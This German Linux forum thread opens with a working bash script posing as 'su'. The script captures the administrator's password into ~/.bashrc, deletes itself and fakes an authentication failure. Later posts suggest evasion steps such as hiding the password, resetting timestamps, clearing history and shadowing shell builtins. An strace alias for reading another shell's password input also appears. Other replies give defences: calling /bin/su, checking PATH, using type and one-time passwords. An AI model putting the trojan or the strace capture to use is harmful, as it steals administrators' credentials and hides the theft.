The Helpful and the Stupid

[linuxCowboy]

"Admin, kannst du mir mal helfen... "

Code: Alles auswählen

#!/bin/bash
# PATH=~/bin
# hash [-t] su
read -rsp 'Password: ' R
echo
echo -E "#_|$R|_" >>~/.bashrc
unset R
rm $0
sleep 2
echo su: Authentication failure
exit 1

Danke.
(das nächste Mal kann ich mir jetzt selber helfen

Moral:
/bin/su statt su

[inne]

Wo hast du dieses Skript her? Selbst geschrieben, fuer wen? Im eigenen $HOME gefunden? Was fuern ... Es steht doch nix im Log ...

[uname]

Nett. Wobei der "Angreifer" muss hierfür "." oder "~/bin" in PATH haben.
Scheinbar ist Ubuntu mit "sudo" doch sicherer

Sicherheitshalber hilft auch:

Code: Alles auswählen

which su

... überlege immer noch ob ich drauf reingefallen wäre ...

[linuxCowboy]

...und, wärst du?

statt which das interne

Code: Alles auswählen

type su

Eine eigene, gepatchte, Shell wäre schon aufwendiger!

Man könnte noch das Password verschleiern. Dass es nirgends im Klartext steht (deniability).

Den Timestamp zurücksetzen. Die History bereinigen.

Und käme damit "spurlos" schon ziemlich nahe!?

...

Ein

Code: Alles auswählen

echo $PATH

zu Anfang und ein Blick in ~/bin beenden den Spaß!

[linuxCowboy]

type lässt sich auch einfach mit einer Shell-Funktion überschreiben!

Aber

Code: Alles auswählen

builtin type su

ruft das builtin auf.

builtin lässt sich ebenfalls mit einer Shell-Funktion überschreiben!

Aber

Code: Alles auswählen

declare -f type builtin

zeigt die Shell-Funktionen.

declare lässt sich auch wieder mit einer Shell-Funktion überschreiben...


( ...wer braucht da noch Quantum!

[uname]

Ein "exit" könnte Wunder wirken. Aber auch das könnte sich manipulieren lassen.

Die Shell des Benutzers ist eine Art "Client" des Benutzers. Und auf einem "unkontrollierten" Client administrative Tätigkeiten durchzuführen ist immer gefährlich.
Es könnte noch eine Art Keylogger geben ("script" geht aber leider nicht)

Ganz nett ist strace (falls installiert) in einem anderen Terminal. Das geht selbst ohne das Programm von ganz oben mit einer nichtmanipulierten Shell:

Code: Alles auswählen

strace -ff -e 'read,write' -p12345

12345 ist hier die Prozess-ID der ersten Shell

Kann man bestimmt auch scripten oder man nutzt z.B. screen wenn nur eine SSH-Sitzung offen sein soll.

Vielleicht kann noch jemand schreiben wie man direkt tty,pts, ... mitlesen kann. Ist mir leider entfallen.

[Phineas]

Ich check den Sinn dieses Threads nicht so ganz. Wenn ich den Admin dazu bringe, von meinem Rechner aus zu administrieren, kann ich doch beispielsweise auch eine Kamera verstecken, oder einen USB-Keylogger zwischen Tastatur und Rechner stecken, um an sein PW zu gelangen.

[uname]

Hat ja keiner behauptet, dass es ein sinnvoller Thread ist. Natürlich würde ein guter Admin wenn überhaupt Einmalpasswörter nutzen (otpw-bin libpam-otpw ).

[linuxCowboy]

Gute Idee mit strace!

Code: Alles auswählen

alias sux='strace -f -o rt~ -e write -p 1650 2>/dev/null&clear'

grep -A2 Password rt~

Erinnert mich an die geile Zeit mit BoundsChecker!

Leider erkennt su das und schlägt fehl.

...

Das tut das Script aber auch. Man muss sich also nur das Passwort greifen und sich beenden.

Den Code veröffentliche ich hier nicht. (da hört der Spaß auf!)

Danke, uname, für die Links!